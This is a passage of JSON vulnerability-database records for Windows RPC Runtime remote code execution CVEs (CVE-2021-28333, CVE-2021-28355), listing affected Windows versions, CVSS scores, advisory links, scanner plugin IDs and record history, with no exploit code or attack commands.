"cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28333", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28333"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-noinfo"], "scheme": null}, {"id": "CVE-2021-28355", "bulletinFamily": "NVD", "title": "CVE-2021-28355", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337, CVE-2021-28338, CVE-2021-28339, CVE-2021-28340, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28345, CVE-2021-28346, CVE-2021-28352, CVE-2021-28353, CVE-2021-28354, CVE-2021-28356, CVE-2021-28357, CVE-2021-28358, CVE-2021-28434.", "published": "2021-04-13T20:15:00", "modified": "2021-04-16T21:08:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28355", "reporter": "secure@microsoft.com", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28355"], "cvelist": ["CVE-2021-28355"], "immutableFields": [], "type": "cve", "lastseen": "2021-04-28T11:49:18", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1809"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2019", "name": "microsoft windows server 2019", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "20h2"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1803"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "20h2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2021-28355"], "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cwe": ["NVD-CWE-noinfo"], "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337, CVE-2021-28338, CVE-2021-28339, CVE-2021-28340, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28345, CVE-2021-28346, CVE-2021-28352, CVE-2021-28353, CVE-2021-28354, CVE-2021-28356, CVE-2021-28357, CVE-2021-28358, CVE-2021-28434.", "edition": 2, "enchantments": {"dependencies": {"modified": "2021-04-17T09:58:44", "references": [{"idList": ["SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001340.NASL"], "type": "nessus"}, {"idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"], "type": "rapid7blog"}, {"idList": ["MS:CVE-2021-28355"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2021-04-17T09:58:44", "rev": 2, "value": 3.5, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1383170976188338179", "text": " NEW: CVE-2021-28355 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/YFoUz5lTjW?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1383170976188338179", "text": " NEW: CVE-2021-28355 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/YFoUz5lTjW?amp=1"}]}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28355", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28355"}], "hash": "5bc0b88f71ccd90eed33ec9f9d1e4b3a4f8c90cd515be4ff42c1fd9b33834462", "hashmap": [{"hash": "d8397aaca09c3d41cbbd37f93b216f7e", "key": "cpe23"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "a0f073c5fb214f89036c3cac33100568", "key": "extraReferences"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "9521587050774f1cd13fb56e97034c12", "key": "href"}, {"hash": "0187fd86f792b6c1e0077d0f69d0ed79", "key": "cvss"}, {"hash": "466c447b6119a8be9494fae20b17c9a1", "key": "published"}, {"hash": "ba8b5ee67ab94918848883f00dab2158", "key": "description"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d5b812c11bd119f970b8a32c5b252c9e", "key": "affectedSoftware"}, {"hash": "56dd3b90fdad5434b2e237c2d2c62919", "key": "cpeConfiguration"}, {"hash": "b023ab75e225f6da1fd3f9fd390d35fe", "key": "cvelist"}, {"hash": "3bf2877e19b91d4143ea460e43ce9041", "key": "cvss2"}, {"hash": "d370d473ba1bd1721d669ef98e2aeebb", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "122bdba5509c507afa2962a93b3d1c93", "key": "cpe"}, {"hash": "5b66eb63ff9d6cd2f4ee117d29be134a", "key": "references"}, {"hash": "797434013b6a54d859a5263bc756e7a6", "key": "cvss3"}, {"hash": "c56482c7ee0cad85eacaff5b2af97e38", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "932da8db5e6348cc13f36dfa8966b423", "key": "modified"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28355", "id": "CVE-2021-28355", "immutableFields": [], "lastseen": "2021-04-17T09:58:44", "modified": "2021-04-16T21:08:00", "objectVersion": "1.5", "published": "2021-04-13T20:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28355"], "reporter": "cve@mitre.org", "title": "CVE-2021-28355", "type": "cve", "viewCount": 1}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 2, "lastseen": "2021-04-17T09:58:44"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2021-28355"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337, CVE-2021-28338, CVE-2021-28339, CVE-2021-28340, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28345, CVE-2021-28346, CVE-2021-28352, CVE-2021-28353, CVE-2021-28354, CVE-2021-28356, CVE-2021-28357, CVE-2021-28358, CVE-2021-28434.", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-04-14T11:37:54", "references": [{"idList": ["SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001340.NASL"], "type": "nessus"}, {"idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"], "type": "rapid7blog"}, {"idList": ["MS:CVE-2021-28355"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2021-04-14T11:37:54", "rev": 2, "value": 3.5, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1383170976188338179", "text": " NEW: CVE-2021-28355 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/YFoUz5lTjW?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1383170976188338179", "text": " NEW: CVE-2021-28355 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/YFoUz5lTjW?amp=1"}]}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28355", "refsource": "MISC", "tags": [], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28355"}], "hash": "b47306b2390e9ed86a46448036ee707638acda2bc1018b51e2e97dbde7150a5a", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "9521587050774f1cd13fb56e97034c12", "key": "href"}, {"hash": "466c447b6119a8be9494fae20b17c9a1", "key": "published"}, {"hash": "a9a1639fea2567e88410c67ed4e76165", "key": "extraReferences"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "ba8b5ee67ab94918848883f00dab2158", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b023ab75e225f6da1fd3f9fd390d35fe", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "5b66eb63ff9d6cd2f4ee117d29be134a", "key": "references"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "c56482c7ee0cad85eacaff5b2af97e38", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "40c747f3c7fe2582f50d51b1b5116564", "key": "modified"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28355", "id": "CVE-2021-28355", "immutableFields": [], "lastseen": "2021-04-14T11:37:54", "modified": "2021-04-13T20:35:00", "objectVersion": "1.5", "published": "2021-04-13T20:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28355"], "reporter": "cve@mitre.org", "title": "CVE-2021-28355", "type": "cve", "viewCount": 0}, "different_elements": ["extraReferences", "cpe23", "cvss", "cvss3", "cvss2", "modified", "cpe", "cwe", "affectedSoftware", "cpeConfiguration"], "edition": 1, "lastseen": "2021-04-14T11:37:54"}], "edition": 3, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "d5b812c11bd119f970b8a32c5b252c9e"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "122bdba5509c507afa2962a93b3d1c93"}, {"key": "cpe23", "hash": "d8397aaca09c3d41cbbd37f93b216f7e"}, {"key": "cpeConfiguration", "hash": "64c56abb30602eab96958881fd107551"}, {"key": "cvelist", "hash": "b023ab75e225f6da1fd3f9fd390d35fe"}, {"key": "cvss", "hash": "0187fd86f792b6c1e0077d0f69d0ed79"}, {"key": "cvss2", "hash": "3bf2877e19b91d4143ea460e43ce9041"}, {"key": "cvss3", "hash": "797434013b6a54d859a5263bc756e7a6"}, {"key": "cwe", "hash": "d370d473ba1bd1721d669ef98e2aeebb"}, {"key": "description", "hash": "ba8b5ee67ab94918848883f00dab2158"}, {"key": "extraReferences", "hash": "a0f073c5fb214f89036c3cac33100568"}, {"key": "href", "hash": "9521587050774f1cd13fb56e97034c12"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "932da8db5e6348cc13f36dfa8966b423"}, {"key": "published", "hash": "466c447b6119a8be9494fae20b17c9a1"}, {"key": "references", "hash": "5b66eb63ff9d6cd2f4ee117d29be134a"}, {"key": "reporter", "hash": "029dfc07c499dc142a429cac0a029e99"}, {"key": "title", "hash": "c56482c7ee0cad85eacaff5b2af97e38"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "946fd3b6afd9af7f90d789b321b73ca35dd07ffe4debaa080ddf0ec0857fcb25", "viewCount": 30, "enchantments": {"dependencies": {"references": [{"type": "mscve", "idList": ["MS:CVE-2021-28355"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001330.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001340.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001335.NASL"]}, {"type": "kaspersky", "idList": ["KLA12142", "KLA12139"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"]}], "modified": "2021-04-28T11:49:18", "rev": 2}, "score": {"value": 3.8, "vector": "NONE", "modified": "2021-04-28T11:49:18", "rev": 2}, "twitter": {"counter": 2, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1383170976188338179", "text": " NEW: CVE-2021-28355 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/YFoUz5lTjW?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1383170976188338179", "text": " NEW: CVE-2021-28355 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/YFoUz5lTjW?amp=1"}]}}, "objectVersion": "1.5", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "affectedSoftware": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1809"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2019", "name": "microsoft windows server 2019", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "20h2"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1803"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "20h2"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": 